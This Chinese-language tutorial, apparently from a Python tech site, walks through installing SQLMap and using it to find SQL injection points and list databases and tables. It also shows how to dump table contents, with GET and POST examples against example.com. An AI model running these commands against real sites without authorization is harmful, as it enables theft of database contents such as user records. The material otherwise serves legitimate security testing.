SQLMap用户手册[续篇]完整攻略
总览
SQLMap是一个方便用户对SQL注入漏洞进行自动化检测和利用的工具。本文旨在详细介绍SQLMap的使用方法,包括各种参数选项和攻击模式。该文是SQLMap用户手册(续篇)的完整攻略。
安装和配置
- 安装
Python
环境 - 安装
SQLMap
- 获取
SQLMap
源代码:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
- 配置
SQLMap
,设置默认参数:
sqlmap.py --wizard
使用方法
步骤一:获取目标和注入点
有多种方法可以获取目标URL和注入点,如:
- 手动探测
- 使用工具
- 网络爬虫
步骤二:测试和检测
通过以下命令进行注入点检测和测试:
python sqlmap.py -u <目标URL> -p <注入参数>
其中,<目标URL>
是待测试的网址,<注入参数>
是需要被注入的参数。SQLMap
会自动探测出注入点并执行注入。
步骤三:查找数据库和数据表
获取数据库:
python sqlmap.py -u <目标URL> -p <注入参数> --dbs
获取数据表:
python sqlmap.py -u <目标URL> -p <注入参数> -D <数据库名> --tables
其中,<数据库名>
是测试过程中发现的数据库名称。
步骤四:爆破数据
获取数据:
python sqlmap.py -u <目标URL> -p <注入参数> -D <数据库名> -T <表名> --dump
例如:
python sqlmap.py -u "http://example.com/page.php?id=1" -p id -D testdb --tables
示例一
以下是使用SQLMap
注入的一个示例:
- 选择注入点:
python sqlmap.py -u "http://example.com/page.php?id=1" -p id
- 获取数据库:
python sqlmap.py -u "http://example.com/page.php?id=1" -p id --dbs
- 获取数据表:
python sqlmap.py -u "http://example.com/page.php?id=1" -p id -D testdb --tables
- 获取数据:
python sqlmap.py -u "http://example.com/page.php?id=1" -p id -D testdb -T users --dump
示例二
以下是使用POST
方法注入的一个示例:
- 选择注入点:
python sqlmap.py -u "http://example.com/login.php" --method POST --data "username=admin&password=123456"
- 获取数据库:
python sqlmap.py -u "http://example.com/login.php" --method POST --data "username=admin&password=123456" --dbs
- 获取数据表:
python sqlmap.py -u "http://example.com/login.php" --method POST --data "username=admin&password=123456" -D testdb --tables
- 获取数据:
python sqlmap.py -u "http://example.com/login.php" --method POST --data "username=admin&password=123456" -D testdb -T users --dump
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:sqlmap用户手册[续篇] - Python技术站